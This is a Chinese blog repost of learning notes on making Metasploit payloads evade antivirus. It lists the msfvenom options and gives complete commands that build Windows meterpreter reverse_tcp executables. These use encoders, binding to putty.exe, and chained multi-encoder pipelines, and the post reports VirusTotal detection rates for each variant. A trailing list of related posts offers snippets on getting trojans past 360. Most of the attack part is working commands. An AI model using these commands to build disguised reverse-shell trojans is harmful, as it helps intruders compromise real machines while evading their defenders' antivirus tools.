msf自免杀

最新推荐文章于 2024-08-10 06:01:36 发布
最新推荐文章于 2024-08-10 06:01:36 发布
阅读量1.6k 收藏 7
点赞数 2
分类专栏: web安全
原文链接:https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247484743&idx=1&sn=0d964ce0f28d3b7085331bbf5aa97616&chksm=ce5e2726f929ae3056bf82d4f1545c3be2874b9baf75c745ffc839745e33d9e066d08cb18e75&mpshare=1&scene=23&srcid=031241TqNHv9psIXFKm8po94&sharer_sharetim
版权

今天大致把远控免杀的文章看了一遍,前面的几篇基本去实现了一遍,后面的直到第26篇全是讲解工具的,大致浏览了一遍,但是没有一一实现啦!

本文转载于:msf自免杀(VT免杀率35/69)

关于工具篇可以查看:远控免杀从入门到实现–工具总结篇

文章目录

1、专业术语

PS:这个先举例一下啦,具体的后期一定补上。

  1. 渗透攻击(Exploit)
  2. 攻击载荷(Payload)
  3. Shellcode
  4. 模块(Module)
  5. 监听器(Listener)

2、msfvenom指令

msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。

让我们看一下此列表中一些最重要的选项。
-p指定我们要使用的Metasploit有效负载
-e指定我们要使用的编码器
-a指定我们要使用的体系结构(默认为x86)
-s指定有效载荷的最大大小
-i指定用于编码有效载荷的迭代次数 ,即编码次数
-x指定一个自定义可执行文件用作模板 ,即绑定一个外部可执行文件,例如 -x putty.exe
-f 告诉MSF编码器输出格式为XXX。例如:-f exe:则告诉编码器文件格式为EXE。

全部命令:
参考链接:https://www.jianshu.com/p/204874fea1d3

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads 
    # 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取
        --payload-options            List the payload's standard options 
    # 列出指定 Payload 的标准可选配置项
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all 
    # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload 
    # 指定 nop 在 payload 中的数量(译者注:类似堆喷射中通过 nop 滑动到 payload)
    -f, --format        <format>     Output format (use --help-formats for a list) 
    # 指定 Payload 的输出格式
        --help-formats               List available formats 
    # 列出所有可用的输出格式
    -e, --encoder       <encoder>    The encoder to use 
    # 指定使用的 Encoder
    -a, --arch          <arch>       The architecture to use 
    # 指定目标系统架构
        --platform      <platform>   The platform of the payload 
    # 指定目标系统平台
        --help-platforms             List available platforms 
    # 列出可用的平台
    -s, --space         <length>     The maximum size of the resulting payload 
    # 设置未经编码的 Payload 的最大长度
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value) 
    # 编码后的 Payload 的最大长度
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff' 
    # 设置需要在 Payload 中避免出现的字符
    -i, --iterations    <count>      The number of times to encode the payload 
    # 设置 Payload 的编码次数
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include 
    # 指定包含一个额外的win32 shellcode文件
    -x, --template      <path>       Specify a custom executable file to use as a template 
    # 指定一个特定的可执行文件作为模板
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread 
    # 保护模板程序的功能,注入的payload作为一个新的进程运行
    -o, --out           <path>       Save the payload 
    # 保存 Payload 到文件
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats 
    # 指定一个变量名
    #(译者注:当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码
    # 追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)
        --smallest                   Generate the smallest possible payload 
    # 尽可能生成最短的 Payload
    -h, --help                       Show this message 
    # 帮助

–list可以列出所有的XXX,例如 msfvenom --list encoders 可以查看所有的编码器。可以用此命令查看的还有 payloads,encoders,nops,platforms,archs,encrypt,formats。

3、免杀之旅

(1)、未作处理的payload(查杀率57/72)

在此我们使用 windows/meterpreter/reverse_tcp生成一个原始的payload的exe文件。

msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.164.*** LPORT=3333 -f exe -o payload1.exe

在virustotal.com上的查杀率位 57/72,额,百分之九十以上了。

在这里插入图片描述

(2)、msf自编码处理(查杀率57/72)

我们可以使用msfvenom --list encoders 查看所有的编码器。
在这里插入图片描述

由图可见 cmd/powershell_base64 和 x86/shikata_ga_nai 为两个平级最高的encoder。

在此,我们使用 x86/shikata_ga_nai 生成 payload 。如下,参数 -i 为编码的次数,参数 -b 为避免出现的字符,即当出现此字符时,将会自动转化成其他字符。

msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.164.*** LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe

这个payload在virustotal.com上的查杀率依旧为 57/72。

由于 x86/shikata_ga_nai 编码技术是多态的,也就是说每次生成的payload文件都会不一样,因此有时可被查杀有时又不会。另外查杀率也和编码次数有关,但是并不是说编码次数越多越好,超过一定的次数便容易出错。

(3)、msf自捆绑免杀(查杀率39/71)

在此,我们将生成payload绑定在指定的模板上,这里为putty.exe。
payload命令如下:

msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.164.*** LPORT=3333 -x putty.exe -f exe -o payload3.exe

此时,在VT上面的查杀率为 39/71,降低了不少。

在这里插入图片描述

(4)、msf自捆绑+编码(查杀率40/72)

将上面的2和3方法结合在一起。

此时,我们的payload为:

msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.164.*** LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe

在VT上面,查杀率为40/72.
在这里插入图片描述

(5)、msfvenom多重编码(44/72)

在此,我们通过管道,让msfvenom用不同的编码器对payload反复编码。

生成的payload为:(收到加了换行,便于观看,执行时不需要哦。)

msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.164.*** LPORT=3333 -f raw 
| msfvenom -e x86/alpha_upper -i 10 -f raw 
| msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

这个只是一个,相对来说,这种的编码姿势有很多。例如:(收到加了换行,便于观看,执行时不需要哦。)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.164.*** LPORT=5110 -f raw 
| msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw 
| msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw 
| msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > payload6.exe

在VT上面查杀率为 44/72。
在这里插入图片描述

xor0ne_10_01
关注
专栏目录
msfvenom 生成 免杀
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-19 465
1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程。2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为c。生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。shikata_ga_nai 是只支持32位的,所以一定不能用64位编译。
网络安全进阶篇之免杀(十四章-9)MSF加密壳免杀过360
划水的小白白
06-01 745
文章目录一、 概念1.1 360 安全卫士和 360 杀毒二、前期准备2.1 下载地址三、具体过程3.1 使用MSF生成木马并监听3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二、前期准备
msf免杀
weixin_30662849的博客
04-13 289
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
Metasploit Framework (MSF) 详解
cxm4545的博客
08-10 1521
Metasploit Framework (简称MSF)是一款开源的渗透测试框架,它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块,为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具,使用命令 msfconsole 或者 双击MSF图标 即可以启动MSF。本篇就以Kali为实验环境来学习MSF
MSF免杀
LainWith的博客
12-12 2974
MSF 参考: 远控免杀专题文章(2)-msfvenom隐藏的参数 远控免杀专题文章(3)-msf免杀(VT免杀率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
msf编码免杀
m0_61506558的博客
09-03 2580
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
全套免杀教程+免杀工具合集
最新发布
08-25
远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf 元控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf 远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf 远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf 远控免杀专题...
我的免杀之路:利用darkarmour实现mimikatz和MSF免杀
ML_Team的博客
09-24 1345
0x1 mimikatz免杀 这里加密字节的过程比较久,尝试运行bypass_mimikatz.exe 运行成功,看看免杀效果如何 Bypass 360 success! Bypass Windows Defender success! V站评分10/66 0x2 MSF免杀 先生成可执行文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 ..
网络安全进阶篇之免杀(十四章-3) MSF用加载器免杀过360
划水的小白白
05-20 636
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 MSF二、 前期准备2.1 加载器下载地址三、具体过程3.1 编译main文件3.2 免杀3.3 测试效果 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 1
网络安全进阶篇之免杀(十四章-10)AVIator msf免杀过360
划水的小白白
06-01 505
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 免杀原理二、前期准备2.1 下载地址三、具体过程3.1 使用MSF生成木马并监听3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。
简单的Msf木马免杀
weixin_47948655的博客
08-12 1194
简单加密shellcode与加载器实现msf木马免杀
免杀方法(三)msf加载器免杀
qq_56426046的博客
10-03 1048
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
利用msfvenom制作windows木马及免杀
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
免杀方法(九)msf加密壳免杀
qq_56426046的博客
10-04 535
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
msf免杀木马生成
qq_66985187的博客
07-04 2389
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 701
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
msf生成免杀木马
qq_56426046的博客
09-08 5664
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
msfvenom——木马免杀
tomyyyyy
08-24 2947
msfvenom——木马免杀篇 目录msfvenom——木马免杀篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值